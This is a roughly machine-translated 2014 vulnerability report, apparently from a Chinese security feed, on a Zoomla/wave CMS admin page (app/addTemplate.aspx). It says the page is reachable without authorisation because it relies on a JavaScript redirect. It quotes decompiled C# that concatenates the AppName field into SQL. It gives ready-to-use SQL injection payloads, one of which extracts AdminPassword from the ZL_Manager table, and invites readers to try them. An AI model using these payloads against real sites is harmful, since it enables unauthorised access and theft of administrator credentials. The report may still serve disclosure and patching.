By wave cms somewhere in the unauthorized filling into the-vulnerability warning-the black bar safety net

2014-11-04T00:00:00
ID MYHACK58:62201455462
Type myhack58
Reporter 佚名
Modified 2014-11-04T00:00:00

Description

http://demo.zoomla.cn/app/addTemplate.aspx 后台 管理, the application of push to add the template.

js jump, can you believe?

app/addTemplate. aspx

code area

%@ page language="C#" autoeventwireup="true" inherits="manage_APP_AddAPP, App_Web_cin4d2pk" enableEventValidation="false" viewStateEncryptionMode="Never" %>

See App_Web_cin4d2pk in manage_APP_AddAPP key code:

if (base. Request. QueryString["ID"] != null)

{

this. model. AppName = this. TextAppName. Text;

this. bll. Update(this. model);//parameterized query...

}

else if ((this. TextAppName. Text. Trim() != null) && (this. TextAppName. Text. Trim() != ""))

{

if (this. bll. Sel("AppName='" + this. TextAppName. Text. Trim() + "'", ""). Rows. Count > 0)//chase a few layers of the function, found to be a parameterized query, calling a problem

{

this. LblMessage. Text = "<font color=red>this application name already exists, please re-enter!</ font>";

So the ID parameter is empty in the Submit, Appname presence of injection.

Vulnerability to prove:

AppName at the fill

'and @@version>0 and '1'='1

'and (select top 1 AdminPassword from ZL_Manager)>0 and '1'='1

Please self-test.